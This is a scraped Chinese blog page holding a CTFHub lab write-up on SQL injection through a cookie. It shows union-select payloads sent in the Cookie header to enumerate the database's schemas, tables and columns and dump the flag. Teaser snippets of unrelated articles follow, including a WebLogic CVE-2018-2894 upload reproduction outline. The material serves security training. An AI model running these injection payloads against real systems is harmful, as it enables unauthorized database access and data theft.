CTFHub技能树-SQL注入-Cookie注入

news2024/9/23 23:15:30

使用bp发现cookie的注入点 id=1，发现为数字型

首先使用联合查询

id = 1 order by 2
id = 1 order by 3

发现2的时候有回显，而3的时候无回显

Cookie: id=-1 union select database(),user()

后面开始库->表->列->数据

Cookie: id=-1 union select 1,group_concat(schema_name) from information_schema.schemata

Cookie: id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

Cookie: id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='cmokfqosjo';

Cookie: id=-1 union select 1,group_concat(frjdriizju) from cmokfqosjo ;

拿到flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2158721.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

WebLogic文件任意上传漏洞CVE-2018-2894

1.环境搭建 cd vulhub-master/weblogic/CVE-2018-2894 docker-compose up -d 2.获取环境后台密码 docker-compose logs | grep password 3.开启web服务测试设置web服务测试开启:域结构->base-domain->高级 ->启动Web服务测试页 4.修改访问目录先进入/ws_utc/co…

Java基础知识扫盲

目录 Arrays.sort的底层实现 BigDecimal(double)和BigDecimal(String)有什么区别 Char可以存储一个汉字吗 Java中的Timer定时调度任务是咋实现的 Java中的序列化机制是咋实现的 Java中的注解是干嘛的 Arrays.sort的底层实现 Arrays.sort是Java中提供的对数组进行排序的…

每日一练：对称二叉树

101. 对称二叉树 - 力扣（LeetCode） 一、题目要求给你一个二叉树的根节点 root ， 检查它是否轴对称。示例 1： 输入：root [1,2,2,3,4,4,3] 输出：true示例 2： 输入：root [1,2,2,n…

对象【JavaScript】

在JavaScript中，对象是一种复合数据类型，它使用花括号 {} 包裹一组键值对。每个键（属性名）后面跟着一个冒号 : 和对应的值。键通常是字符串（或符号），而值可以是任意数据类型。 1. 对象字面…

数据脱敏-快速使用

1.数据脱敏定义数据脱敏百度百科中是这样定义的： 数据脱敏，指对某些敏感信息通过脱敏规则进行数据的变形，实现敏感隐私数据的可靠保护。因为在真正的生产环境中,很多数据是不能直接返回,但是我们工作的时候可能经常性的需要返回一些用户信…

公司将被千万美金收购，工程师却误删数据库 —— 没有备份！！！

前些天，Retention 和 RB2B 的 CEO，Adam Robinson，在领英（LinkedIn）发帖讲了一个恐怖故事。 2021 年 3 月，在他第一个创业公司即将以一千万美金被收购的两周前，他们的一位工程师不小心删除了整个…

M9410A VXT PXI 矢量收发信机，300/600/1200MHz带宽

M9410A PXI 矢量收发信机 -300/600/1200MHz带宽- M9410A VXT PXI 矢量收发信机，300/600/1200MHz带宽支持 5G 的 PXI 矢量收发信机（VXT）是一个 2 插槽模块，具有 1.2 GHz 的瞬时带宽主要特点 Keysight M9410A VXT PXIe 矢量收发…

SpringBoot+Vue技术框架开发的ADR智能监测系统源码，Java语言的药品不良反应智能监测系统源代码

系统概述： 药品不良反应是指合格药品在正常用法用量下出现的与用药目的无关的有害反应。药品不良反应智能监测系统是一种用于监测和收集药品在使用过程中发生的不良反应的系统。它基于医院临床数据中心，运用信息技术实现药品不良反应的智能监测、报告管…

46.哀家要长脑子了！

1.435. 无重叠区间 - 力扣（LeetCode） 方法一：动态规划实际上本质就是找最长的无重叠子序列，那么我们可以遍历这个区间的集合，只要前一个区间的右端点是小于等于后一个区间的左端点，那么这两个区间就不是重…

C：内存函数

目录前言： 一、memcpy 函数的使用及实现 1、memcpy函数的介绍 1.1 memcpy函数参数解读 2、memcpy函数的使用 3、memcpy函数的模拟实现二、memmove函数的使用及模拟 1、memmove函数的使用 2、memmove函数的模拟实现三、memset 函数的使用 1、memset函数的…

mybatis 配置文件完成增删改查(五) ：单条件动态sql查询，相当于switch

文章目录单条件动态sql查询写测试方法疑问总结单条件动态sql查询 <select id"selectByConditionBySingle" resultMap"brandResultMap">.select *from tb_brandwhere<choose>/*相当于switch*/<when test"status ! null">…

基于Vision-Board的智能应急环境监测控制小车

目录 1 项目概述 1.1 项目背景 1.2 系统功能介绍 1.2.1 下位机智能小车控制系统 1.2.2 微信小程序App 1.2.3 PC上位机App 1.3 框图介绍 1.3.1 主控板卡 1.3.2 小车控制模块 1.3.3 通信模块 1.4 系统使用的技术要点 2 系统硬件设计 2.1 Version board主控板块系统结…

ollama 部署教程（window、linux）

目录一、官网二、安装方式一：window10版本下载三、安装方式二：linux版本docker 四、模型库五、运行模型六、API服务七、python调用 ollama库调用 langchain调用 requests调用 aiohttp调用八、模型添加方式 1.线上pull 2.导入 GGU…

HCIA--实验十九：配置接口DCHP

一、实验内容 1.需求/要求： 通过一台5700交换机和一台PC，通过在交换机的接口上配置接口DHCP来实现PC自动获取ip地址。二、实验过程 1.拓扑图： 2.步骤： 1.给vlan10配置ip地址，进入vlan10开启接口的DHCP&#xff1…

药用植物的空间多组学：从生物合成途径到工业应用-文献精读51

Spatial multi-omics in medicinal plants: from biosynthesis pathways to industrial applications 药用植物的空间多组学：从生物合成途径到工业应用摘要随着分子测序和成像技术的快速发展，药用植物的多组学研究进入了单细胞时代。我们讨论了空间多…

EMT-LTR–学习任务间关系的多目标多任务优化 title： Learning Task Relationships in Evolutionary Multitasking for Multiobjective Continuous Optimization author： Zefeng Chen, Yuren Zhou, Xiaoyu He, and Jun Zhang. journal： IEE…